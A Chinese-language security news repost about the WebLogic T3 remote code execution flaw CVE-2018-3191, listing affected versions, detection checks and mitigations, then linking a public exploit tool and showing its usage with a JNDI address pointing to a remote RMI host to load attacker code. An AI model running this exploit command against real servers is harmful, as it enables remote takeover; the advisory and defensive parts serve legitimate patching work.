内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具

2018-11-06 21:04 出处:清屏网 人气: 评论(0

1.1背景

北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击网络服务器被攻击者接受,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,李正东申报通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致。

有人已经复现成功,来源jas502n的朋友圈图片

而且发现已经被灰产写成批量入侵工具,还在服务器上跑着呢!

所以呢,有一大波肉鸡在路上,如果你不想成为肉鸡,尽快修复!

1.2漏洞编号

CVE-2018-3191

1.3漏洞等级

高危

二、修复建议

2.1受影响版本

WebLogic 10.3.6.0

WebLogic 12.1.3.0

WebLogic 12.2.1.2

WebLogic 12.2.1.3

2.2漏洞检测

检查WebLogic的版本号是否为受影响版本。

检查是否开启了WebLogic的T3服务。

2.3解决方案

Oracle官方已经在本次的关键补丁更新(CPU)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆 https:// support.oracle.com 后,可以下载最新补丁。

1.过滤T3协议

2.设置Nginx反向代理

3.升级到最新JDK

JEP290(JDK8u121,7u131,6u141)

工具指定要带着的,要不然留言会骂死华盟君的,

https:// github.com/voidfyoo/CVE -2018-3191/releases

https:// github.com/voidfyoo/CVE -2018-3191

用法

  1. java -jar weblogic-spring-jndi.jar <jndi_address>

 

例如:

  1. java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp

 

笔记

weblogic-spring-jndi-12.2.1.3.jar 对于weblogic:

  • 12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar 对于weblogic:

  • 10.3.6.0
  • 12.2.1.0
  • 12.1.3.0

12.2.1.1

分享给小伙伴们:
本文标签: CVE-2018-319

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号